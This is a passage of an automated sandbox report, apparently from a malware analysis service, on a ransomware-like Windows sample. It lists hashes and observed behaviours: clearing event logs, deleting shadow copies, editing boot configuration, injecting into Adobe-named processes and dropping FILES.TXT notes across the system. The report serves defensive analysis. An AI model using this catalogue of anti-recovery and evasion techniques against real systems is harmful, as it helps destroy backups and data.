max time kernel
147s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
22-11-2024 02:14
Behavioral task
behavioral1
Sample
0.4658229854220858.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
00331dd25b83984d4b6d9753fec2b306e88ac87371ea48188df49cb630905d3a.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
065988f36f3ab99ff40893c7ad756cfcc3baea1b8b5217f17cdd6e44160df0a0.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
082671641341d89fe49d0da717846035ba6af02edb59840148eddc3586d21557.exe
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
0997ba7292ddbac1c7e7ade6766ed53c.exe
Resource
win7-20240708-en
Behavioral task
behavioral7
Sample
0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f.exe
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
0c3431dbb8cd0478250eb4357257880e_localui.dll
Resource
win7-20241023-en
Behavioral task
behavioral9
Sample
0cd7440ca94d31212e21867439f38f0828823b76c94d566e81f5dfaf71574ebc.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe.vir.exe
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
101.ex_.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
119.executable.exe
Resource
win7-20241010-en
Behavioral task
behavioral13
Sample
119.unp.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
11abb44de53807e32980a010a473514694f901841e63ab33f5e0ff8754009b47.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
11fb52c96853e12f011b7b7894e9884e56eb5522.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
123.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
139.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
13E418BF18B03AC80580DB69ADA305A2B7093DFED00692DCF91A99D2526D3A73.dll
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
144.exe
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
17697e1829f0d18d2051a67bc2bca134_da3ded254909e9abaa46eb5bc3b10944.dll
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
19561b33793dcb865eae56575a899ce8_kovter_from_Sakura82_taskmanger.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
19ec0d0e5143940492a1c79c06eb8f18aa9feb356e41b8b79fdc6a16a3bcd7bf_TDS=4F9B33C5.exe
Resource
win7-20241010-en
Behavioral task
behavioral23
Sample
1a6bed2afff1b9880e42a29cea9b8139bcb12e34085fb008de13aa983b82a4f2.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
1f210c60f90fd8403099482455f3220b56b2864bc4d2b6af0abda4a2c3854d40.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
20c6d29da875075afa0ed7b4fb58e555de89d4bed13bf5ad109817c593ddd77d.exe
Resource
win7-20241023-en
Behavioral task
behavioral27
Sample
234e77145d329956192c389249e20520851853e2a33779be93530788201b612d.exe
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
263fc6fc9efa4c05a08d9ff1fc7bb060a7b8f376f82afa17fd3fc267bc8e8032.exe
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
2e0da054d03fde4e7b2c2057cc4aa410c64b6ab8777ee6d4fd43f031a5170a23.zip
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
Compenso.Pdf______________________________________________________________.exe
Resource
win7-20240903-en
Behavioral task
behavioral31
Sample
301a3f5017e578fb04b0eb33f45831bb9bb8318020e0a18d222ebea08bf1c75f.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
30620.ex_.exe
Resource
win7-20241010-en
General
-
Target
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
-
Size
727KB
-
MD5
d13f890034a68ccb4af4e0bf51e2b5ec
-
SHA1
84afde24c913c007b0c0490041b61877aa254737
-
SHA256
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4
-
SHA512
0065844527f3a3556bc50705f9d5608561a04e95a2d99b1a262db1094ca188425ef69f02f801eab2eaf74e14e027ceebb471a754192e195e51b6c57d3d7d45ce
-
SSDEEP
12288:jk2624GHVUBOSRVrHZfiZHJ2HFO/9xwrPgWyzZp+L7vN3:H6+VUBraeF8/tSh
Malware Config
Extracted
C:\FILES.TXT
Signatures
-
Clears Windows event logs 1 TTPs 8 IoCs
pid Process 8668 wevtutil.exe 1396 wevtutil.exe 1148 wevtutil.exe 2052 wevtutil.exe 2388 wevtutil.exe 5596 wevtutil.exe 6616 wevtutil.exe 15584 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3052 bcdedit.exe 3056 bcdedit.exe 4468 bcdedit.exe 4548 bcdedit.exe -
pid Process 1048 wbadmin.exe 4672 wbadmin.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT A3DUtility.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AcroBroker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AcroRd32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AdobeCollabSync.exe -
Executes dropped EXE 1 IoCs
pid Process 12708 AcroRd32Info.exe -
Loads dropped DLL 60 IoCs
pid Process 2884 AcroBroker.exe 2884 AcroBroker.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe -
Drops desktop.ini file(s) 48 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Links\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Videos\desktop.ini A3DUtility.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Documents\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Libraries\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Videos\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\691RDNCS\desktop.ini 
A3DUtility.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Downloads\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CW1M20CU\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\I618Z2Y3\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Documents\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini AcroBroker.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini A3DUtility.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini A3DUtility.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\desktop.ini A3DUtility.exe File 
opened for modification C:\Users\Public\Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\C1JHBK4W\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Desktop\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Searches\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini A3DUtility.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1200 powercfg.exe 8944 cmd.exe 8288 powercfg.exe 6016 powercfg.exe 1928 powercfg.exe 1896 powercfg.exe 6100 powercfg.exe 12948 powercfg.exe 2156 cmd.exe 1404 powercfg.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2860 set thread context of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 set thread context of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 set thread context of 15668 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 56 PID 2860 set thread context of 2092 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 58 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\System\it-IT AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8F.GIF A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\bin\JdbcOdbc.dll A3DUtility.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar A3DUtility.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\FILES.TXT AcroRd32.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 A3DUtility.exe File opened for modification C:\Program Files\Common Files\System\msadc\msdfmap.dll AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll A3DUtility.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg AcroBroker.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\UIAutomationClientsideProviders.resources.dll AcroRd32.exe File opened for modification C:\Program Files\Reference 
Assemblies\Microsoft\Framework\v3.0\System.IdentityModel.Selectors.dll AcroRd32.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd AcroBroker.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\es-ES\FILES.TXT A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.DPV A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF A3DUtility.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO A3DUtility.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui AcroRd32.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe AdobeCollabSync.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York A3DUtility.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES AcroBroker.exe File opened for modification C:\Program Files (x86)\Microsoft 
Office\Office14\Microsoft.Office.BusinessData.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TextConv\fr-FR 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File created C:\Program Files\Java\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files (x86)\Common Files\System\es-ES AcroBroker.exe File created C:\Program Files\Microsoft Games\More Games\es-ES\FILES.TXT AcroRd32.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui AcroBroker.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe AdobeCollabSync.exe File opened for modification C:\Program Files\Common Files\System\msadc\msdaremr.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNoteSyncPC.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML AcroBroker.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll AdobeCollabSync.exe File 
opened for modification C:\Program Files (x86)\Common Files\Adobe\Help\en_US AcroRd32.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico AcroBroker.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303 AdobeCollabSync.exe File created C:\Program Files\Uninstall Information\FILES.TXT AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES AcroRd32.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui AcroBroker.exe File opened for modification C:\Program Files\Java\jre7\lib\applet AdobeCollabSync.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd AdobeCollabSync.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt A3DUtility.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\FILES.TXT AcroBroker.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\FILES.TXT AcroBroker.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\FILES.TXT A3DUtility.exe File created C:\Windows\FILES.TXT AcroBroker.exe File created C:\Windows\FILES.TXT AcroRd32.exe File created C:\Windows\FILES.TXT AdobeCollabSync.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A3DUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdobeCollabSync.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2032 vssadmin.exe 9228 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 1784 vssvc.exe Token: SeRestorePrivilege 1784 vssvc.exe Token: SeAuditPrivilege 1784 vssvc.exe Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: SeRestorePrivilege 2624 WMIC.exe Token: SeShutdownPrivilege 2624 WMIC.exe Token: SeDebugPrivilege 2624 WMIC.exe Token: SeSystemEnvironmentPrivilege 2624 WMIC.exe Token: SeRemoteShutdownPrivilege 2624 WMIC.exe Token: SeUndockPrivilege 2624 WMIC.exe Token: SeManageVolumePrivilege 2624 WMIC.exe Token: 33 2624 WMIC.exe Token: 34 2624 WMIC.exe Token: 35 2624 WMIC.exe Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: SeRestorePrivilege 2624 WMIC.exe Token: SeShutdownPrivilege 2624 WMIC.exe Token: SeDebugPrivilege 2624 WMIC.exe Token: SeSystemEnvironmentPrivilege 2624 WMIC.exe Token: SeRemoteShutdownPrivilege 2624 WMIC.exe Token: SeUndockPrivilege 2624 WMIC.exe Token: SeManageVolumePrivilege 2624 WMIC.exe Token: 33 2624 WMIC.exe Token: 34 2624 WMIC.exe Token: 35 2624 WMIC.exe Token: SeBackupPrivilege 1588 wbengine.exe Token: SeRestorePrivilege 1588 wbengine.exe Token: SeSecurityPrivilege 1588 wbengine.exe Token: SeSecurityPrivilege 1396 wevtutil.exe Token: SeBackupPrivilege 1396 
